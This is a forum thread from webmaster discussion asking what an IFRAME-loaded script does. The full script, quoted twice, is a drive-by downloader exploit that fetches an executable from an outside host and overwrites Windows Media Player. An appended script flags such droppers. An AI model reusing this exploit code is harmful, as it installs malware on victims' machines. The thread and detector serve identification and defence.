What does this script do exactly?

  • FreeOnes
    Confirmed User
    • Jul 2001
    • 3406

    #1

    What does this script do exactly?

    http://traffic.hitscounter.biz/count65/ss.js.php

    wmplayerpaths= [
        "C:\\Programmer\\Windows Media Player\\wmplayer.exe",
        "D:\\Programmer\\Windows Media Player\\wmplayer.exe",
        "C:\\Program\\Windows Media Player\\wmplayer.exe",
        "D:\\Program\\Windows Media Player\\wmplayer.exe",
        "C:\\Programme\\Windows Media Player\\wmplayer.exe",
        "D:\\Programme\\Windows Media Player\\wmplayer.exe",
        "C:\\Programmi\\Windows Media Player\\wmplayer.exe",
        "D:\\Programmi\\Windows Media Player\\wmplayer.exe",
        "C:\\Programfiler\\Windows Media Player\\wmplayer.exe",
        "D:\\Programfiler\\Windows Media Player\\wmplayer.exe",
        "C:\\Programas\\Windows Media Player\\wmplayer.exe",
        "D:\\Programas\\Windows Media Player\\wmplayer.exe",
        "C:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe",
        "D:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe",
        "D:\\Program Files\\Windows Media Player\\wmplayer.exe",
        "C:\\Program Files\\Windows Media Player\\wmplayer.exe"
    ];
    function IfExists(path) {
        try {
            var r = 1;
            var s = new ActiveXObject("ADODB.Stream");
            s.Mode = 3;
            s.Type = 1;
            shahahahahaha();
            s.LoadFromFile(path);
        } catch (e) {
            return 0;
        }
        return 1;
    }
    try {
        for (i=0;i<wmplayerpaths.length;i++) {
            wmplayerpath = wmplayerpaths[i];
            if (IfExists(wmplayerpath)) break;
        }
        var x = new ActiveXObject("Microsoft.XMLHTTP");
        xhahahahahaha("GET", "http://download.hitscounter.biz/count65/test.exe",0);
        x.Send();
        var s = new ActiveXObject("ADODB.Stream");
        s.Mode = 3;
        s.Type = 1;
        shahahahahaha();
        s.Write(x.responseBody);
        s.SaveToFile(wmplayerpath,2);
        location.href = "mms://";
    } catch(e) { }



    VBS/Psyme:http://us.mcafee.com/virusInfo/defau...virus_k=100749

    thanks for your help

    The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa
  • Jace
    FBOP Class Of 2013
    • Jan 2004
    • 35562

    #2
    it appears to be trying to find windows media player and then streaming something


    • grumpy
      Too lazy to set a custom title
      • Jan 2002
      • 9870

      #3
      tests in several languages if the Windows Media Player is installed
      (or at least on the hard disk),
      then loads a test.exe and looks like it replaces the media player or links to it.
      Last edited by grumpy; 07-12-2004, 03:35 PM.
      Don't let greediness blur your vision | You gotta let some shit slide
      icq - 441-456-888


      • grumpy
        Too lazy to set a custom title
        • Jan 2002
        • 9870

        #4
        put the script here as a text link...then we can read all the ahahaa shit
        Don't let greediness blur your vision | You gotta let some shit slide
        icq - 441-456-888


        • zanycash Pete
          Confirmed User
          • Jun 2004
          • 1023

          #5
          Sees what version of WMP is on your system??

          $45 Per Join or 60/40 Rev Share!
          New Fresh Hosted Galleries And High Quality/Converting Sites!
          Free Hosting, Free Content, Awesome Free Hosted Gallery Generator!
          ICQ#249-429-941


          • FreeOnes
            Confirmed User
            • Jul 2001
            • 3406

            #6
            Originally posted by grumpy
            put the script here as a text link...then we can read all the ahahaa shit
            it loads from this page via an IFRAME
            http://www.babes-club.com/jelena_foot/01.html

            The new FreeOnes! - AdultFilmStarContent - BabeGalleries and much more! - 1Strike Movies and much more! All powered by Xpressa


            • grumpy
              Too lazy to set a custom title
              • Jan 2002
              • 9870

              #7
              no iframe in that page
              Well not for me.
              Don't let greediness blur your vision | You gotta let some shit slide
              icq - 441-456-888


              • Robertf
                Confirmed User
                • Feb 2004
                • 392

                #8
                beh i had that once :-/ a version of it ...

                It replaces a Windows Media Player file .. then copies a file to your %windows% folder ... makes sure it starts up when your computer starts ... and that you can't delete it (easily)

                After that came into my comp ... 90% of the links on my own webpage .. went somewhere else ( thanks to that i knew directly i had something in my comp)

                ....


                • sandman!
                  Icq: 14420613
                  • Mar 2001
                  • 15431

                  #9
                  Originally posted by FreeOnes
                  http://traffic.hitscounter.biz/count65/ss.js.php

                  wmplayerpaths= [ "C:\\Programmer\\Windows Media Player\\wmplayer.exe", "D:\\Programmer\\Windows Media Player\\wmplayer.exe", "C:\\Program\\Windows Media Player\\wmplayer.exe", "D:\\Program\\Windows Media Player\\wmplayer.exe", "C:\\Programme\\Windows Media Player\\wmplayer.exe", "D:\\Programme\\Windows Media Player\\wmplayer.exe", "C:\\Programmi\\Windows Media Player\\wmplayer.exe", "D:\\Programmi\\Windows Media Player\\wmplayer.exe", "C:\\Programfiler\\Windows Media Player\\wmplayer.exe", "D:\\Programfiler\\Windows Media Player\\wmplayer.exe", "C:\\Programas\\Windows Media Player\\wmplayer.exe", "D:\\Programas\\Windows Media Player\\wmplayer.exe", "C:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Archivos de Programa\\Windows Media Player\\wmplayer.exe", "D:\\Program Files\\Windows Media Player\\wmplayer.exe", "C:\\Program Files\\Windows Media Player\\wmplayer.exe" ]; function IfExists(path) { try { var r = 1; var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.LoadFromFile(path); } catch (e) { return 0; } return 1; } try { for (i=0;i<wmplayerpaths.length;i++) { wmplayerpath = wmplayerpaths[i]; if (IfExists(wmplayerpath)) break; } var x = new ActiveXObject("Microsoft.XMLHTTP"); xhahahahahaha("GET", "http://download.hitscounter.biz/count65/test.exe",0); x.Send(); var s = new ActiveXObject("ADODB.Stream"); s.Mode = 3; s.Type = 1; shahahahahaha(); s.Write(x.responseBody); s.SaveToFile(wmplayerpath,2); location.href = "mms://"; } catch(e) { }



                  VBS/Psyme:http://us.mcafee.com/virusInfo/defau...virus_k=100749

                  thanks for your help

                  It's an exploit. If it's a gallery submitted, delete it; if it's a trade, you might want to delete it.

                  It's an old exploit also; not many people still use it.
                  Need WebHosting ? Email me for some great deals [email protected]


                  • Nasty
                    Confirmed User
                    • Aug 2002
                    • 1575

                    #10
                    I don't get an iframe on that page but I see it's another one of those http://yourownfreehost.com/ sites; a lot of funky shit seems to be coming up on those sites

                    “Ours is a world of nuclear giants and ethical infants. We know more about war than we know about peace, more about killing than we know about living. If we continue to develop our technology without wisdom or prudence, our servant may prove to be our executioner.” ― Omar Bradley (1948)

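The behaviour the posts above describe (fetch an executable over XMLHTTP, then write it over wmplayer.exe through ADODB.Stream) can be flagged statically before a submitted page is listed. This is an added example, not part of the thread: the indicator names, verdict labels and sample strings are assumptions constructed for illustration, and the sample is a deliberately incomplete fragment.

```javascript
// Added example: static triage of script text for the download-and-overwrite
// pattern. Indicator ids and verdict names are assumptions of this example.
const INDICATORS = {
  stream: /ActiveXObject\s*\(\s*["']ADODB\.Stream["']/i,              // binary file read/write object
  xmlhttp: /ActiveXObject\s*\(\s*["'](?:Microsoft|Msxml2)\.XMLHTTP/i, // HTTP fetch object
  saveToFile: /\.SaveToFile\s*\(/i,                                   // writes the stream to disk
  exeUrl: /["']https?:\/\/[^"']+\.exe["']/i,                          // remote executable
  localExe: /["'][A-Za-z]:\\{1,2}[^"']*\.exe["']/i,                   // hard-coded local .exe path
  protoLaunch: /location\.href\s*=\s*["']mms:/i,                      // hands off to the media player
};

// Collapse "AB" + "CD" into "ABCD" so split string literals do not hide an indicator.
function normalise(source) {
  return source.replace(/["']\s*\+\s*["']/g, "");
}

function triage(source) {
  const text = normalise(source);
  const hits = Object.keys(INDICATORS).filter((id) => INDICATORS[id].test(text));
  const has = (id) => hits.includes(id);
  let verdict = "clean";
  if (has("stream") || has("xmlhttp")) verdict = "suspicious";
  // Fetch + disk write + an executable on either end is the overwrite-dropper shape.
  if (has("xmlhttp") && has("stream") && has("saveToFile") &&
      (has("localExe") || has("exeUrl"))) {
    verdict = "dropper";
  }
  return { verdict, hits };
}

// Constructed samples; host and file names are placeholders, calls are elided.
const SAMPLE_DROPPER = String.raw`
var p = "C:\\Program Files\\Windows Media Player\\wmplayer.exe";
var x = new ActiveXObject("Microsoft.XML" + "HTTP");
/* request for "http://download.example.invalid/payload.exe" elided */
var s = new ActiveXObject("ADODB.Stream");
s.SaveToFile(p, 2); location.href = "mms://";`;
const SAMPLE_BENIGN = `var r = new XMLHttpRequest(); r.open("GET", "/stats.json"); r.send();`;

console.log(triage(SAMPLE_DROPPER), triage(SAMPLE_BENIGN));
```

A "suspicious" verdict only means an ActiveX file or network object is instantiated; pages that pull the script in through an IFRAME or remote `src` need the fetched script body passed to `triage`, not the hosting page.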